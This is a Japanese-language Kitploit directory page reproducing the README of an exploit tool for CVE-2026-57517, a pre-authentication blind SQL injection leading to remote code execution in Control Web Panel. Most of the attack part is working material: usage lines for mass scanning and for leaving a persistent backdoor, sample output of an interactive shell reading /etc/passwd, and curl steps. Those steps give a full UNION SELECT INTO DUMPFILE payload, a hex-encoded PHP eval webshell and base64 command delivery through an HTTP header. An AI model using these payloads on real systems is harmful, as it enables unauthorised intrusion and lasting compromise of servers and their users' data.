Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-57517 — 💉 ブラインドSQLインジェクション → Control Web Panel (CWP) ≤ 0.9.8.1224 向け RCEエクスプロイト — userRes POST → INTO DUMPFILE → cwpsvc シェル | Kitploit
ツール/GitHubGitHub/shinthink/cve-2026-57517
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHubshinthink/cve-2026-57517

CVE-2026-57517

💉 ブラインドSQLインジェクション → Control Web Panel (CWP) ≤ 0.9.8.1224 向け RCEエクスプロイト — userRes POST → INTO DUMPFILE → cwpsvc シェル

リポジトリを見る
1122ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-57517 — Control Web Panel ブラインドSQLインジェクション → RCE

Python CVE CVSS License

Control Web Panel ≤ 0.9.8.1224 — リモートコード実行に至るブラインドSQLインジェクション

Port 2083 → userRes POST → INTO DUMPFILE → Port 2031 Webshell → cwpsvc



🔴 脆弱性の概要

CVE-2026-57517 は、Control Web Panel (CWP) バージョン ≤ 0.9.8.1224 における、認証前の重大なブラインドSQLインジェクションです。ユーザーパネルのエンドポイントにある userRes POSTパラメータは、SQLクエリに埋め込まれる前にサニタイズされません。クエリは権限(グローバルな 権限を保持)で実行されるため、攻撃者は を介して任意のファイルを書き込むことができます。

MySQL root
FILE
INTO DUMPFILE

典型的な悪用チェーンでは、Webアクセス可能なRoundcubeログディレクトリにPHPウェブシェルを配置し、cwpsvc サービスアカウントとしてリモートコード実行を達成します。

フィールド詳細
CVECVE-2026-57517
CVSS9.8(Critical)— CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
種別CWE-89 — ブラインドSQLインジェクション(認証前)
影響を受けるバージョンControl Web Panel ≤ 0.9.8.1224
修正版バージョン 0.9.8.1225
公開日2026年7月1日
研究者Egidio Romano (Karma In Security)
PoC公開 — KIS-2026-12

📦 インストール

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt

📖 使い方

root@kitploit:~
# Single target (auto-detect username)
python cve_2026_57517.py -t 192.168.1.100

# Single target with known username
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc

# Mass scan
python cve_2026_57517.py -f targets.txt -o live.txt

# Interactive shell
python cve_2026_57517.py -t target.com --rce -u cwpsvc

# Persistent backdoor (no auto-cleanup)
python cve_2026_57517.py -t target.com --no-cleanup
root@kitploit:~
  -t, --target      Single target host
  -f, --file        File with targets (one per line)
  -u, --username    CWP username (skips auto-detection)
  -o, --output      Live TXT output file
  --json            JSON report file
  --threads         Concurrent workers (default: 20)
  --timeout         Request timeout seconds (default: 15)
  --no-cleanup      Leave shells on target
  --rce             Interactive shell mode
  -v, --verbose     Verbose output

🧪 概念実証(PoC)

シナリオ 1: マススキャン

root@kitploit:~
$ python cve_2026_57517.py -f targets.txt -o live.txt -v
root@kitploit:~
────────────────────────────────────────────────────────────
  CVE-2026-57517 | 5 targets | 20 threads
  Cleanup: yes
  Live TXT: live.txt
────────────────────────────────────────────────────────────

  ✅ 192.168.10.100:2083  [rce_confirmed]  18.2s
     User  : admin
     Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
     RCE   : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
             cwp-prod-01.example.com
     whoami: cwpsvc

  ⚠️ 192.168.10.200:2083  [sqli_failed]  12.1s
     User  : cwpsvc
     Error : SQL injection failed — target may be patched or path not writable

  · 192.168.10.50:2083  [not_cwp]  2.3s

==================================================
  SCAN SUMMARY
==================================================
  Total      : 5
  ✅ RCE      : 2
  ⚠️  SQLi Fail : 1
  🔍 No User  : 1
  ·  Not CWP  : 1
==================================================

シナリオ 2: インタラクティブシェル

root@kitploit:~
$ python cve_2026_57517.py -t target.com --rce -u admin
root@kitploit:~
  CWP Interactive Shell — target.com
  Type 'exit' to quit, 'cleanup' to remove shell

cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)

cwp$ hostname
cwp-prod-01

cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash

cwp$ exit

シナリオ 3: 手動再現(curl)

ステップ 1 — ポート2083でCWPに到達できることを確認

root@kitploit:~
curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'

ステップ 2 — ユーザー名の検証

root@kitploit:~
curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = user exists

ステップ 3 — userRes を介したSQLインジェクション

このペイロードは、INTO DUMPFILE で書き込まれる16進エンコードされたPHPシェルを使った13カラムのUNION SELECTを使用します:

root@kitploit:~
" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
root@kitploit:~
# The tool handles hex encoding automatically. Manual equivalent:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'

curl -sk 'https://target.com:2083/admin/' \
  -d "userRes=$PAYLOAD"

ステップ 4 — ウェブシェル経由でコマンドを実行(ポート2031)

配置されたPHPシェルは、C: HTTPヘッダーからコマンドを読み取ります:

root@kitploit:~
<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
root@kitploit:~
# Base64-encode: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)

curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)

ペイロードの内訳

コンポーネント値
SQLカラム13カラムのUNION SELECT
PHPシェル<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
16進エンコードMySQL 0x... 16進リテラル
書き込み方法INTO DUMPFILE(バイナリ完全一致のファイル書き込み)
ターゲットパス/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php
コマンド配信base64エンコードされたPHPを載せたHTTPヘッダー C:
コマンド実行passthru(base64_decode('{cmd}'))

⚠️ 免責事項

🚨 教育および許可されたテスト目的のみ

このソフトウェアは教育目的および正当なセキュリティ研究のためにのみ提供されます。以下の用途を想定しています:

  • 🛡️ 許可を得たペネトレーションテストを実施するセキュリティ専門家
  • 🏢 自社のCWPインフラを監査する組織
  • 🔬 脆弱性の悪用技術を研究する研究者
  • 🎓 Webアプリケーションセキュリティを学ぶ学生

❌ 以下の目的でこのソフトウェアを使用してはなりません:

  • 明示的な書面による許可なしにコンピュータシステムへアクセスすること
  • 所有していないシステムを侵害、損傷、または妨害すること
  • いかなる種類の違法行為を行うこと

⚖️ 法的通知

コンピュータシステムへの不正アクセスは、以下の法律に違反します(これらに限定されません):

  • 米国: Computer Fraud and Abuse Act(18 U.S.C. § 1030)
  • インドネシア: UU ITE 第30条および第46条(2008年法律第11号、2024年法律第1号による改正)
  • 欧州連合: 指令 2013/40/EU
  • 英国: Computer Misuse Act 1990(1990年コンピュータ濫用法)

著者は、本ツールの使用に起因する誤用、損害、または法的結果について一切の責任を負いません。本ソフトウェアを使用することにより、お客様はご自身の行動に対して単独で責任を負うことを認識し、適用されるすべての法律を遵守することに同意したものとみなされます。


📚 参考情報

リソースリンク
Karma In Security アドバイザリKIS-2026-12
オリジナルPoCCVE-2026-57517.php
フルディスクロージャーSecLists
OpenCVECVE-2026-57517
CWP チェンジログcontrol-webpanel.com

⚡ セキュリティ研究と教育のために作られました ⚡

このプロジェクトは、Control Web Panel および Apache Software Foundation とは提携関係にありません。

ツールをダウンロード